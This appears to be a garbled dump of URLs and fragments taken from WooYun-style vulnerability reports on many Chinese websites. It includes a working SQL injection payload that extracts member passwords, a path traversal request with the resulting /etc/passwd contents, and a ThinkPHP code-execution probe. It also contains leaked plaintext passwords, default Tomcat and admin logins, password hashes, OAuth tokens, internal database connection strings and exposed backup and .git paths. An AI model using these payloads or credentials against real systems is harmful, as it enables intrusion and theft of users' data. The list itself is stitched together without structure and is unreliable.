http://trip.suning.com/corptravel-web/company/companyContr/initEditor.htm http://zhishi.suning.com/zhishitang/backend/uRPhotoBack.action zhishi.suning.com/zhishitang/backend/viewURPhotoReplyList.action?status=0 http://**.**.**.**/ http://**.**.**/${path}/user/login.action http://account.bozhong.com/register/index http://svwtrainnet.csvw.com http://www.17y.com/longart/130208.html http://**.**.**.**/ http://**.**.**.**/IntroDetail.aspx?TID=002700040002 http://**.**.**.**/admin/admin_login.aspx http://120.203.214.96/xsgj/index.jsp http://game.joyup.tv/admin/default/login.html http://open.mail.qq.com/cgi-bin/communication?sid=DIBFyfQ1kYxvlhhN&t=open_communication&action=delip&ip=1.1.1.1&ef=js&resp_charset=UTF8 http://open.mail.qq.com/cgi-bin/communication?s=communication&sid=DIBFyfQ1kYxvlhhN&t=open_communication& http://top.gaoloumi.com/citylist.php?id=43 http://top.gaoloumi.com/system/login.php http://soj.sysu.edu.cn/,存在sql注入漏洞,通过sql注入可获取到5万多学生的账号信息等。 http://wg.sflep.com/mainPage/KcDetail.aspx?classid=K201305290001 http://pas.sflep.com/index.php?option=com_readingtrees&view=readingtrees&gradeid=1&Itemid=7 http://mt.mangocity.com/tcpb/index.php?c=login_controller&m=login https://github.com/feiniu7903/feiniu_pet/blob/781d571b8e663ce0c5a98b556a11c1638e22990a/pet/pet_job/src/main/config/const.properties http://117.121.46.15/WBooK/Login.aspx http://**.**.**.**/ www.gzczkj.cn http://www.gzczkj.cn http://www.vcanbio.com/Company_News_Detail.aspx?id=332存在SQL盲注漏洞 http://**.**.**.**/web/gszz.asp?id=327&menuid=328&menu=%EF%BF%BD%EF%BF%BD%CB%BE%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://cms-wpcms.dopool.com/ http://events.sflep.com/mt/index.aspx http://www.cqpds.com.cn/ www.cqpds.com.cn http://**.**.**.**/zfsd/msg_detail.jsp?msg_info_id=20150819105704000001 http://www.myuios.com http://www.myuios.com/diguo.txt http://www.myuios.com/cpp.php http://www.epweike.com http://www.wooyun.org/corps/%E4%B8%80%E5%93%81%E5%A8%81%E5%AE%A2%E7%BD%91 http://oa.ebscn.hk/names.nsf?Login&UserName=albertchan&Password=a22105222&RedirectTo=/weboa/webpage.nsf http://**.**.**.** http://bbs.wasu.cn/ http://bbs.wasu.cn/home.php?mod=task&do=view&id=2 http://bbs.wasu.cn/home.php?mod=task&do=view&id=2 http://bbs.wasu.cn/home.php?mod=task&do=draw&id=2 http://www.qust.edu.cn/ http://www.dfcv.com.cn/ModelPages/Company/Events.aspx?ColumnCode=Achievement http://58.250.68.42**** http://23.91.96.37 https://23.91.96.37 http://219.143.118.86/ http://218.30.99.176/MyDocument/SystemPrompt.aspx http://218.30.99.176/Photo/Asset-20150827163855-asp.aspx a1d1:50c9:9929:b40c%11 c55:34f3:f591:f68d c55:34f3:f591:f68d%19 http://www.dfcv.com.cn/ModelPages/Company/Board.aspx?type=JS http://222.134.52.40:80/admin/sys/login.aspx http://222.134.52.40:80/admin/sys/login.aspx http://www.dfcv.com.cn/ServiceSite.aspx http://www.iqegg.com/.git/config http://fangvip.ganji.com/hr_v2/?c=Auth&a=login# http://club.super.cn/Excel/exportClubContacts.xls?clubId=&clubPeriodId= http://**.**.**.**/tv?code=stdtbyds http://www.smart2pay.com.tw/qa.php?no=5 http://www.smart2pay.com.tw/events_detail.php?no=255 http://**.**.**.**/video.html?cid=481 http://**.**.**.**/phpinfo.php http://**.**.**.**/admin/ ugc.gs.baofeng.com/login,这个接口了,看厂商回复: http://hz.genshuixue.com/ http://www.genshuixue.com/student_center/profile http://t.cn/RyZCR0F http://www.genshuixue.com/student/profile?user_number=875503478 http://ysh.cpicorp.com.cn/newsimg.asp?id=420 http://ysh.cpicorp.com.cn/newsimg.asp http://**.**.**.**/xzhk.php?id=135 http://www.hall.tsinghua.edu.cn/ http://www.hall.tsinghua.edu.cn/sys http://opensh.suning.com:8080/shsys-admin/contentRecord/list.htm http://opensh.suning.com:8080/shsys-admin/mainTree.htm http://opensh.suning.com:8080/shsys-admin/contentRecord/list.htm http://tc.newp.cn/Default.aspx?bid=112&unit=5 mt.mangocity.com/tcpb/index.php?c=login_controller&m=login http://www.dafengct.com/user/getpwd.html。输入注册手机号,并获取验证码。 wangfang:Passwd1234) http://www.hp1997.com/passport/AjaxValidHasEmail.aspx?email= http://www.hp1997.com/passport/AjaxValidUserName.aspx?username= http://www.hp1997.com/passport/AjaxValidHasPhone.aspx?phone= http://61.155.6.105/ http://eduadmin.open.com.cn/login.aspx?Pwd=qxt8324057&URLFrom=open&UserName=qingxt http://examadmin.open.com.cn/Admin/Index.aspx http://14.29.1.103/iptvurgesys/ http://14.29.1.103/iptvurgesys/front/frontBindUser_toBindUserEdit.action?openId=omMuluPrPiMT1LdhV3JUrCherymM http://www.laiqian.com/index.php?r=ZipoGegu/IpoGegu&ipo_id=147&code=HLI&navIndex1=1 URL:http://oa.ccib.com.cn/InforForWeb/list.asp?id=123 http://**.**.**.**/shop,选择黑色手表购买 http://oa.bwoil.com/names.nsf?Login http://tongxue.open.com.cn/ cn:17000 http://stu.zoomla.cn/guestbook/Default.aspx?CateID=2这个页面中有个编辑器,点击超链接可以止传附件,抓包修改后缀 http://www.sobot.com/ http://**.**.**.**/view.php?id=83 http://report.dyjk.cn/zhibiao_view.php http://report.dyjk.cn/dangan_view.php?id=250531 http://report.dyjk.cn/dangan.php http://**.**.**.** http://info.iweihai.cn/space.php?user= http://info.iweihai.cn/space.php?user=%df http://www.123youhuo.com/mostpart.php https://github.com/brightliu12/php/blob/87a596df60bc99acfd728d0e0135ede0ee442c14/src/Org/PhpMailer/SendEmail.php http://bj.xinniangjie.com/search_user/a http://**.**.**.**/cn/search.asp?提交=&color=红色&productmodel=7MIL http://**.**.**.**/Zongg/index.asp http://**.**.**.**/zongg/index.asp http://**.**.**.**/zongg/index.asp http://**.**.**.**/zongg/index.asp http://**.**.**.**/zongg/index.asp http://**.**.**.**/zongg/index.asp http://**.**.**.**:8081/zongg/index.asp http://**.**.**.**/zongg/index.asp[username http://www.creditease.cn/ http://**.**.**.**:9003/axis2-web/ http://**.**.**.**:9000/axis2-admin/ http://jifen.xywy.com/duihuan/c68.html,就选这个铲子来演示了 https://github.com/Hancoson/treebear mongodb://localhost/sx_images http://www.001bank.com/ http://www.tsca.com.tw/house/house_view.asp?no=137 http://www.tsca.com.tw/auction/auction_view.asp?no=980 http://211.151.5.23/vianet/ http://211.151.5.23/vianet/admin.php?s=/Public/login.html http://usa.go.cn/jmx-console/ http://**.**.**.**/searchpage.asp POST:key=123&search=qz&button=%C8%CB%B2%C5%BF%EC%CB%D9%CB%D1%CB%F7 http://www.laiqian.com/index.php?r=zusers/ChangePW www.laiqian.com http://**.**.**.**/infolist.php?id=11&cid=58 www.wapqq.cn http://www.wapqq.cn http://www.smartapp4u.com/androidService/productSdk/toAdd.h?productId=3769 http://www.bjrc.com/erp/erpReg.asp存在POST注入 www.bjrc.com http://www.bjrc.com/ http://**.**.**.**/Article/NewsDeatils.aspx?id=158 http://**.**.**.**/bugs/wooyun-2015-0107138 http://**.**.**.**/ http://**.**.**.**/vipchat/setup/ http://**.**.**.**/vipchat/VerifyCodeServlet?var=cookie_username http://**.**.**.**/vipchat/setup/admin.jsp http://210chelejia.make-15088.300.cn http://meimi.make-15088.300.cn/members_login.html http://bbs.edaijia.cn/.git/config http://ysh.cpicorp.com.cn/dq/news.asp http://mail2.glsc.com.cn:8084/names.nsf?Login http://mail2.glsc.com.cn:8093/stcenter.nsf?OpenDatabase http://oa.glsc.com.cn http://quickr.glsc.com.cn:8091/LotusQuickr/gxwd/PageLibrary4825779600335E8A.nsf/h_Toc/ede61a95ab493a984825779600336fca/?OpenDocument http://wooyun.org/bugs/wooyun-2015-0138376一个模板? http://newoa.glsc.com.cn:8082/names.nsf/$users https://ztejindou.com:443/ http://www.smyfinancial.com/ http://files.smyfinancial.com/qr/2ecce08f07f54dada********.jpg http://files.smyfinancial.com/qr http://files.smyfinancial.com/qr/558cab34ed7749c9b2da1f989697469d.jpg http://who.cndns.com/?d=lcy8.cc&s=&checktype=Whois http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** admin:c3949ba59abbe56e057f service:9db06a3742c66ef95e9a http://**.**.**.** admin:5c06308e06a462e72d92|,|wenzhang:e29c4b074ae3b30bc964 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** admin:e8d5e43ff295c3505076fda55fbb4597 http://**.**.**.** http://**.**.**.** admin:1d396b56a512c4825156 http://**.**.**.** admin:1d396b56a512c4825156 http://**.**.**.** qdjiaotong:dfac6a6f80be6322ebc9|,|jiang-lin:8dbc97588be90021a0ea http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** admin:4e575b4a09e9056e9426 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://cmri.hiall.com.cn/mysql.txt http://whois.xinnet.com/domain/whois_login.jsp http://whois.xinnet.com/domain/whois/search.do?method=toRefresh www.itnrw.com/admin http://cmri.hiall.com.cn/1/test.sql http://**.**.**.**:80/static/comment/showmsg_special.php?cid=34&url=editor_ent_film.html&total=3&vid=3 http://ilovebi.hiall.com.cn/s.php http://**.**.**/login.jsp http://mail2.glsc.com.cn:8084/names.nsf?Login http://mail2.glsc.com.cn:8084/names.nsf/$users http://www.hunliji.com/admin/new_chat# http://www.hunliji.com/admin/new_chat# http://www.jgsteel.cn/oa/ www.jgsteel.cn http://www.jgsteel.cn http://ku.cetools.cn/back/login.asp http://ku.cetools.cn/back/login.asp http://ku.cetools.cn/back/b2b_upimgloads.asp?formname=form1&editname=pic&uppath=/buy2buyupfile&filelx=jpg http://ku.cetools.cn/wooyun123321.asp http://www.mihoyo.com/hsod2_homepage/news.php?id=6 http://op.renrenche.com/ http://www.shenzhenly.cn/Fckeditor/editor/filemanager/connectors/test.html http://ktshop.tcl.com/ http://ktshop.tcl.com:80/ http://www.vivibride.cn/m/arc.php?aid=7928 http://www1.xjmu.edu.cn/KYKFC/admin/login.asp http://haiwai.house.sina.com.cn/news/list?ca=00 http://haiwai.house.sina.com.cn/news/list?ca=-9%df http://218.57.146.147:8333/mp/rest/这个地址 http://218.57.146.147:8042/ http://campus.coolpad.com/index.php?c=schoolRecruitment&cate=1%0a&f=jobPosition&id=dKSg https://112.115.106.162:6443 https://112.115.106.184/por/login_psw.csp?rnd=0.02132954215630889 http://a.bdmob.cn/list.php?parent_id=2&cate_id=12 http://a.bdmob.cn/infolist.php?parent_id=22&cat http://sqlmap.org http://www.ayibang.com http://**.**.**.**/policy/display/9.do https://120.132.48.126/ http://etc.gdut.edu.cn/exam/manager.html http://**.**.**.**:88/qjga/jsp/login.jsp http://**.**.**.**:88 http://www.gpsabc.cn/ http://www.gggps.com/ http://www.gps108.com/ http://www.utraveller.net/ http://www.tbitgps.com:8080 http://www.gpsabc.cn/carAction!getCarByID.do?carId=193362&t=1441103243329 http://www.doyouhike.net:80/ B563E07E7FB4A8F497EC7BAC18231A40:FG=1 www.doyouhike.net http://www.sttacas.org/admin/index.php http://bdzcf.com/zChou/toLogin.do http://**.**.**.**/ http://**.**.**.** https://github.com/gaokuilin/jira_ruby/blob/1d79e7bd8fbd936d2fb1470ca10e30c62ada4092/jira6.rb http://www.mshdai.com/index.php?ctl=help&act=detail&id=14 http://www.mshdai.com/index.php?ctl=stations&act=detail&id=20 http://www.mshdai.com/index.php?ctl=stations&act=contact&id=22 http://www.mshdai.com/index.php?ctl=new%27&id=27 http://cy.ujs.edu.cn/sysadmin/ http://www.kkeye.com/tfadmin/tfadmin.rar http://mojing.baofeng.com/admin/index/login http://**.**.**.**/bugs/wooyun-2010-0102460已经提交keword参数存在注入,并且已经整改,但是参数grade_id、section_id http://www.wogps.net/ http://www.wogps.net/Lbs/MainFrame.ashx?nowdate=21-40-31&callJudge=selectedNodeChanged&CompanyID=80&ClientID=undefined,其中CompanyID为从1到90的任意数字 http://www.wogps.net/BaseInfo/MaintenanceData.ashx?callJudge=selectCompanyInfo&hidCompanyID=1可以查看此系统所有使用部门及公司信息 http://job.shangdu.com/search.php?city_id=38%27 http://www.91daoxue.com/ http://**.**.**.**/logon/logonOut.action http://nos.netease.com/mail-online/66a5925e819b3a3b0429810360bf28ba/mail180x180.jpg","access_token2":"2312224de56c8a368399fd6bf7220d02","token_secret":null,"expires_in":"86400","code":"1","refresh_token":"f7da74d51fb044ffad41096da0018351","connExpireTime":"1443877476756","access_token":"f0fb105739356f146bd1a6aba4d17ac2 http://jira6-demo.hz.netease.com jdbc:mysql://10.120.154.169:3306/jira?useUnicode=true&characterEncoding=UTF8&sessionVariables=storage_engine=InnoDB jdbc:mysql://10.120.154.169:3306/jira?useUnicode=true&characterEncoding=UTF8&sessionVariables=storage_engine=InnoDB https://webatm.scu.org.tw/eatmscu/ https://webatm.scu.org.tw/eatmscu/logon.jsp?svcBankId=163 http://wooyun.org/bugs/wooyun-2015-0108929 http://www.5150w.cn/ http://lengku.5150w.cn/ http://www.117go.com/tour/82722613 http://kids.sflep.com/wicresoft.pgs.web/default.aspx?SignIn=true http://kids.sflep.com/Wicresoft.FeedBack/InformationSearch.aspx http://wap.kdnet.net/ https://www.shfft.com/ajax/getAmount.action, http://mail.open.com.cn/(其实邮箱域名有好几个.....) http://www.hnaa.net.cn/index.php?r=cmsSite/list&id=11 http://oa.open.com.cn/user/login http://219.139.20.19:8080/Main/Main.aspx http://isdm.nuc.edu.cn/Edit/editor/img.htm# http://pre-forum.grandcloud.cn/ http://pre-forum.grandcloud.cn/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x27,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://pre-forum.grandcloud.cn/templates/grandcloud/.svn/entries http://pre-forum.grandcloud.cn/test.php http://m.haodf.com/touch/booking/rependpatient?patientId=891005883 http://218.247.130.150/pi.php http://218.205.175.250/test.php http://tdxbjm.csc108.com/test.php https://112.124.211.176/.git/config https://112.124.211.186/image.do http://**.**.**/zabbix-bakup/ https://www.hjiabank.com/ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** www.ddy98.com http://shop.ehuatai.com/manage/login.action存在st2漏洞 http://pro.ezloan.cn/phpmyadmin/ http://pro.ezloan.cn/phpmyadmin/ http://silent.lianluo.com/silent/admin/admin_login.action http://www.softtrans.com/ http://gateway.pactera.com http://gateway.pactera.com http://**.**.**.**/main/users/resetPwd/index.html#ty http://**.**.**.**/taskprint/login.jsp http://**.**.**.**/taskprint/category/userAction_login.action http://**.**.**.**/taskprint/god.jsp http://www.jjshome.com http://183.129.228.3/member.php?mod=logging&action=login&referer=%2Fhome.php http://china-yintai.com/newsContent.php?id=228 http://www.openedu.cn/ http://www.openedu.cn/admin/login.aspx http://116.213.120.229/tools/upload_ajax.ashx http://www.east.net/user/userForgetPassword?code=f22e3bc14cf6d089c0df65e068ada946&email=807085168%40qq.com http://auto.mop.com/topic/workpage/index.shtml http://pic.auto.mop.com/admin/login.jsp http://www.tmall.com/go/chn/common/js-api.php http://61.233.19.170/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://**.**.**.**:7001/medicine-price.jsp?page=1&BH=&MC=1 http://10.11.180.18/guest/device_provisioning2.php?cmd=login&mac=74:51:ba:56:34:7f&ip=10.180.146.90&essid=PA_WLAN_MR&apname=00:24:6c:c0:19:1e&apgroup http://oa.kdnet.net/?a=edt&c=info&id=385&pid=9853 http://**.**.**.**/ http://**.**.**.** http://12580.weili.cmpower.cn http://docs.jpush.io/guideline/android_guide/ http://docs.jpush.io/client/android_api/#receiver android:name="您自己定义的Receiver android:enabled="true android:name="cn.jpush.android.intent.REGISTRATION android:name="cn.jpush.android.intent.UNREGISTRATION android:name="cn.jpush.android.intent.MESSAGE_RECEIVED android:name="cn.jpush.android.intent.NOTIFICATION_RECEIVED android:name="cn.jpush.android.intent.NOTIFICATION_OPENED android:name="cn.jpush.android.intent.ACTION_RICHPUSH_CALLBACK android:name="cn.jpush.android.intent.CONNECTION android:name="您应用的包名 dckf.digitalchina.com/index.php/point/register,其中参数userid和username均存在注入。 index.php/point/register http://**.**.**.**/ http://**.**.**.**/.git/config http://vip.yishion.com/act1.php?id=13 http://111.206.82.153/web/admin.php http://qingmengjia.com/ http://180.97.28.88/ https://**.**.**.**/findloginpwd/findloginpwd1.jsp http://122.96.93.126/index.php?c=ufr&model=Pioneer+M1&fid=6 http://122.96.93.126/index.php?c=ufr&model=Pioneer+M1&fid=6 http://**.**.**.**/ind_qyyj.asp?id=119 http://**.**.**.**/bugs/wooyun-2010-055517 http://www.ssap.com.cn/admin/CEC_Login.htm http://www.ssap.com.cn/SKWX/XueShu/XueShu_SearchInfo.aspx?searchText=a%27&channelId=10029 http://www.4008823823.com http://203.130.41.40:80/download/resource/下面的不同的产品目录里面 http://203.130.41.40:80/download/resource下载用户的头像,幸运的是该目录可以列目录 URL:http://**.**.**.**/InfoValue.aspx?id=75 http://www.intimecity.com.cn/view/index/index.php?id=49 username:fhytc password:fhytc123 http://**.**.**.**/ http://**.**.**.** http://group.edai.com http://update.funshion.com/login/index.php?c=login&a=login&so=begin http://drops.wooyun.org/tips/845 http://**.**.**.**/ http://**.**.**/index.html http://**.**.**.**/cn/about/default.aspx http://**.**.**.**/?source=bd002 http://lib.ia.ac.cn/ http://jiayzh.isl.ac.cn http://wuzhj.isl.ac.cn/ http://lilj.isl.ac.cn/ http://wangm.isl.ac.cn/ http://wuzhj.isl.ac.cn http://hmiss.siat.ac.cn http://crehabtech.siat.ac.cn http://mis.siat.ac.cn http://lrh.siat.ac.cn http://nano.siat.ac.cn http://tmc.siat.ac.cn/8 http://geneandcelllab.siat.ac.cn www.mted.ibcas.ac.cn http://www.mted.ibcas.ac.cn http://www.mted.ibcas.ac.cn http://www.mted.ibcas.ac.cn http://ecores.cib.ac.cn http://eam.cib.ac.c http://fbm.cib.ac.cn http://herpneuro.cib.ac.cn http://westcrops.cib.ac.cn http://tcm.cib.ac.cn/ http://sci.ia.ac.cn/ http://iblog.ciomp.ac.cn http://dx.qhlly.cn:8080/QBOS/ cn:8080 http://dx.qhlly.cn:8080 http://202.99.45.117/oop.jsp http://**.**.**.**/article/index.php http://coldchain.panasonic.cn/ http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347 http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347 http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347 http://coldchain.panasonic.cn/w_xwzx/show_news.jsp?noteid=347 http://**.**.**.**/ http://**.**.**.**/index.php/Business/index/id/14 http://**.**.**.**:81/ http://**.**.**.**:81/file/reg-wsj.asp admins:admins http://**.**.**.**/inform_detailinfo.jsp?subType=tzgg&key=45053520 http://pas.sflep.com/index.php?option=com_products&view=products&cid=12&Itemid=3 http://2.suning.com https://**.**.**.**/netpay/ https://**.**.**.**/ http://**.**.**.**/template/LYGCL-N/script/search.aspx?content=* http://api.ffan.com/ffan/user/15000000000002100?userType=0&mac=68%3A3E%3A34%3A32%3AA0%3AFE&appid=feifan&day=20150902&wdId=db9f5185ab0beb3c4b6ea459952918c2&couponStatus=3&imei=525af1deaf994570ae27070eb4b8b0f064d3ef4c&clientversion=20020&version=1&loginToken=f80871a2b390d8cbccdf96dc032c9be5&keywordType=0&mailStatus=0&ddId=525af1deaf994570ae27070eb4b8b0f064d3ef4c&orderStatus=%5B%22INITIAL%22%5D&bookingStatus=1 http://218.28.100.164:66/index.jsp http://nc.sinorail.com/index.jsp http://61.50.130.202:8080/index.jsp http://61.232.6.152/index.jsp http://202.104.113.14:8081/index.jsp http://61.135.227.114/index.jsp http://42.243.108.34/index.jsp http://222.189.30.38:8081/index.jsp http://221.6.47.226:88/index.jsp http://210.75.98.52/index.jsp http://218.94.92.43/index.jsp http://210.13.83.58/index.jsp http://203.86.55.104:8080/index.jsp http://221.226.98.6:8088/index.jsp http://221.226.215.205:8000/index.jsp http://221.2.65.198/index.jsp http://218.94.129.167/index.jsp http://221.2.65.198/index.jsp http://218.2.103.100/index.jsp http://123.150.95.86/index.jsp http://115.231.95.234/index.jsp http://58.213.130.237:8000/index.jsp http://101.95.113.130/index.jsp http://218.28.100.164:66/index.jsp https://jiaofei.alipay.com/market/chargeRemindInfoEntering.htm https://zht.alipay.com/asset/newIndex.htm http://**.**.**.**/cms/docInfo!list.action?templateId=44&channelId=64&code=dkmbx http://**.**.**.**/basic/usermanager/sysOrgUser/login http://mail.east.net/webmail/ http://yimin.edai.com/news.php?classid=3 http://yimin.edai.com/immigrate.php?act=home&country=27 http://www.piaozhijia.cn:80/feedback/queryFeedbackList data:mobile=angelina http://**.**.**.**/peixun/HXPayOrder.aspx?productID=cfzz1&CfzzUser=sdsdsdsd&CfzzUID=109&type=3 http://**.**.**.**/Expert_saying/index_on1.aspx?username=all&pageindex=2&stockid= http://mail.iliangcang.com/ http://**.**.**.**/servlet/FileDownload?filepath=C:\Windows\System32\notepad.exe&dispname=1.exe http://yunpan.cn/cmYW4UHdgRT2M http://yunpan.cn/cmY5vHsqkPZ8J http://new.edong.com:80/ http://shequ.docin.com/app/teamMessage/updateTeamDisdussion?teamId=2536&cardId=5244022 URL:http://www.83800000.com.cn/customer/setNewPassword?phoneNo=手机号 http://www.yjtf.im/yjtf/admin/index.htm http://gateway.minanins.com:9002/console/login/LoginForm.jsp http://gateway.minanins.com:9002/job1/test1.jsp?o=vLogin http://www.vcanbio.com//Investor_ArticleDetail.aspx?id=8 http://yt.linekong.com/reporter.php?serverName=%D7%DD%BA%E1%CB%C4%BA%A3&sort_id=304 http://**.**.**.**/manager/index.htm http://**.**.**.**/bugs/wooyun-2010-0102089 http://**.**.**.**/newsshow.aspx?NewsId=424 http://dckf.digitalchina.com/ http://**.**.**.**/shenpi/mjzz/platform/frame.do http://**.**.**.**/portal/HomePage!index.do http://**.**.**.**/ http://sales.tsingtao.com.cn:8080 http://mail.dlairport.com http://eb.e-bridge.com.cn/newebridge/default.jsp http://www.kkeye.com/dcjj/dcjijin_bak.rar http://www.kkeye.com/dcjj/DCJJ.rar http://www.kkeye.com/kkeyet/newuser/data1.txt http://www.kkeye.com/kkeyet/newuser/list.txt http://www.kkeye.com/kkeyet/newuser/listjjbao.txt http://www.kkeye.com/kkeyet/newuser/listjjbao1.txt http://www.kkeye.com/kkeyet/newuser/listmt.txt http://www.kkeye.com/kkeyet/newuser/listmt1.txt http://www.kkeye.com/kkeyet/newuser/listqy1.txt http://**.**.**.**/login.aspx http://chat11.jd.com/ http://chat9.jd.com/ http://www.kkeye.com/feedlogin/ http://www.kkeye.com/FeedLogin/MediaInfo/Default.aspx http://**.**.**.**/AdminUserLogin.aspx http://yt.linekong.com/article.php?article_id=* http://yt.linekong.com/lookvote.php?vote_id=* http://yt.linekong.com/reporter.php?serverName=%D5%CC%BD%A3%B3%A4%B8%E8&sort_id=* http://yt.linekong.com/voting.php?types=radio&vote_id=* http://gps.jztey.com/lbsn/CLDMain/Login.htm http://gdykyy.com/lbsn/CLDMain/MainPage.htm http://www.kkeye.com/crm2/ http://crm.kkeye.com/ http://bbs.fund123.cn/。发现可以插入图片。 http://**.**.**.**/bns/resume/ResumeInfo/showAddPage.do http://59.175.169.110:6080/ZRDJ_UI/Count/personDetail.aspx?sqbh=220238 http://59.175.169.110:6080/ZRDJ_UI/FamilyManage1.aspx?keyId=2213008 http://59.175.169.110:6080/BZJDGL/tscl/tsclSys_Edit.aspx?id=47(修改id参数即可遍历) http://cn.toursforfun.com/mall?clk_source=Promotions&clk_term=mall&utm_source=ad&utm_medium=wzl&utm_term=mall http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21 http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21* http://yt.linekong.com/activity/dragon/content.php?article_id=* http://yt.linekong.com/special/newversion/detail.php?article_id=* http://yt.linekong.com/special/newversion1.4/article.php?article_id=* http://yt.linekong.com/voting.php?types=radio&vote_id=* http://**.**.**.**/ http://**.**.**/ www.0574ic.com http://**.**.**.**/women?subCate=tops http://dw.c6s.cn/New/login.jsp http://www.dsfjk.com:8080/loginAction!newLogin.do http://dw.c6s.cn/carAction!getCarById.do?car.id=1032 http://dw.c6s.cn/driverAction!getById.do?driver.id=68 http://gms.funshion.com/ http://180.166.148.90/index.php?m=my&f=index http://**.**.**.**/test/ http://**.**.**.**/web/ http://**.**.**.**/download/ http://**.**.**.**/zzcx/zzcx/chaxun.aspx(表单提交处存在漏洞) https://mail.youku.com/owa/ http://uos.manage.youku.com www.ilife.cn http://www.ilife.cn/Common/ProductRemarkDetail.asp?ProductRemarkId=565 http://www.ilife.cn/Common/ProductRemarkDetail.asp www.casagroup.com.cn http://order.casagroup.com.cn http://home.casagroup.com.cn http://vip.umisky.com/UploadFiles/Users/U1000025007/adefbb25-4ce8-45b7-924f-116bd50cd7e8.aspx http://**.**.**.**/ https://www.anpingdai.com/index.php?s=/Home/About/infoDetails/category_id/6/id/12.html https://www.anpingdai.com/index.php?s=/Home/About/infoDetails/category_id/6/id/12*.html http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ https://github.com/bilychen/learngit/blob/f8e2c327f53df4a207f827b0707ba3c2eca3601f/userful.txt https://oa.hujiang.com/ https://www.teambition.com http://npm.repository.servision.com.cn http://navigator.servision.com.cn:8402 http://navigator.servision.com.cn:8401 http://class.hujiang.com/ http://class2.hujiang.com/ http://yz.class.hujiang.com/ com:class/mc-hujiang-com.git com:class/class-hujiang-com.git https://gitlab.yeshj.com/ http://**.**.**.**/ssqpk/betHistory.action?userName=137994616&lotteryId=119 url:http://59.44.219.196:80/manager/html user:tomcat pass:tomcat http://59.44.219.196/probe/ http://**.**.**.** http://**.**.**.**/uddiexplorer/SetupUDDIExplorer.jsp http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/NewsView5.asp?id=1 http://kybpc.chexian.sinosig.com/easyInsurance/html5/login.html http://kybpc.chexian.sinosig.com/easyInsurance/html5/downLoad.do http://**.**.**.**/news.asp?key=a https://onstar.com.cn/ http://**.**.**.**/# http://**.**.**.**/admin?alias=photo&tab=definition jdbc:oracle:thin:@**.**.**.**:1521:ksrk http://mail.7daysinn.cn/ http://**.**.**/data/worktable/ http://bang.liba.com/resource/decorate/delicacy/album/1412/comm http://bang.liba.com/resource/decorate/delicacy/album/1412/collect user:tomcat pass:tomcat user:tomcat pass:tomcat user:tomcat pass:tomcat user:admin user:tomcat pass:tomcat user:admin pass:admin user:tomcat pass:123456 URL:http://**.**.**.**/api/api/student/profile/seconde/get/ http://**.**.**.**/api/ubus/services/obtainCode http://gz.voc.com.cn/ http://gz.voc.com.cn/data/admin/ver.txt http://www.51booking.cn www.51booking.cn)创立于2005年,隶属于广州忠侨咨询服务有限公司,是中国领先的在线旅游预订服务提供商之一,运用网络概念成功整合了高科技产业与传统旅行业,向超过100万会员提供国内酒店预订,城市旅游指南等,会员酒店覆盖全国550个商旅城市,酒店信息高达18,000余家。 http://www.51booking.cn/system/ user:admin pass:admin http://test.365yf.com/ http://test.365yf.com/admin http://**.**.**.**/men.php?id=4 http://tuser.kdnet.net/login_new.asp http://absfx-rf.com/zh-cn/read.jsp?id=1,如图所示: http://www.af-express.com/city.aspx?wang=957&city=974&type=%E8%B4%9F%E8%B4%A3%E4%BA%BA&keywords=123 http://www.af-express.com/city.aspx?wang=957&city=975&type=%E8%B4%9F%E8%B4%A3%E4%BA%BA&keywords=123 http://dmoa.cofco.com/seeyon/index.jsp http://**.**.** http://**.**.**.**/Frmmain.asp http://**.**.**.**/pmvm5/logon.asp http://www.yoho.cn/passport/personal/setting https://mail.richinfo.cn/webmail/login/login.do http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-028946 wanlehui.fumu.com/portal.php?mod=list&catid=6&cate_sub=9&order_term=1&master=刘彤 http://baodian.fumu.com/module/aciton/param1/$%7B@print%28THINK_VERSION%29%7D http://baodian.fumu.com/admin/ http://download.jikexueyuan.com/detail/id/1970*.html http://www.eventdove.com/ate/getAttendeeInfo/e/51404620/u/1211开始遍历 http://**.**.**.**/news-detail.php?id=2675 http://wooyun.org/bugs/wooyun-2010-085917这个漏洞,里面有张截图泄漏了员工号和邮箱前缀,没打码哈哈~ http://**.**.**.**/ http://m.xyzq.com.cn:8888/scopia/entry/index.jsp http://m.xyzq.com.cn:8888/scopia/admin/index.jsp http://**.**.**.**/browser.do?browser=../../../../../../../../../../etc/passwd&method=download root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin 